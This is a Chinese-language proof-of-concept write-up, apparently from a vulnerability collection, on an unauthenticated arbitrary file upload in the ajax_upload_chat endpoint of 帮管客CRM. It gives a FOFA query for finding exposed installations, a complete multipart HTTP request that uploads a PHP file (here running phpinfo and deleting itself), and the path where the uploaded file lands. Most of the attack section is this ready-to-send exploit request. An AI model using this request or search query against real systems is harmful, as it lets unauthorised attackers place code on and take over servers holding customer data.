POC/wpoc/帮管客CRM/帮管客CRMajax_upload_chat存在任意文件上传漏洞.md

48 lines
1.9 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# 帮管客CRM ajax_upload_chat存在任意文件上传漏洞
# 一、漏洞简介
帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统客户管理从未如此简单一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞未经授权的攻击者可利用该漏洞获取服务器权限。
# 二、影响版本
+ 帮管客CRM
# 三、资产测绘
+ fofa`app="帮管客-CRM"`
+ 特征
![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/h4aYWkJUdTJ5y2vF/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-024774.png)
# 四、漏洞复现
```plain
POST /index.php/upload/ajax_upload_chat HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o
------WebKitFormBoundaryv1WbOn5o
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php
phpinfo();unlink(__FILE__);
------WebKitFormBoundaryv1WbOn5o--
```
![1706690830026-a7bab378-c87a-46bc-85d4-686ab7e8fb18.png](./img/h4aYWkJUdTJ5y2vF/1706690830026-a7bab378-c87a-46bc-85d4-686ab7e8fb18-379617.png)
上传文件位置
```plain
//data//uploads//uploads_chat//202401//202401311645381ARfoVrTb.php
```
![1706690872806-eb87eaac-9761-44e5-8d65-22646a6ab0f5.png](./img/h4aYWkJUdTJ5y2vF/1706690872806-eb87eaac-9761-44e5-8d65-22646a6ab0f5-162023.png)
> 更新: 2024-02-29 23:55:41
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zv9kvh2812magvgl>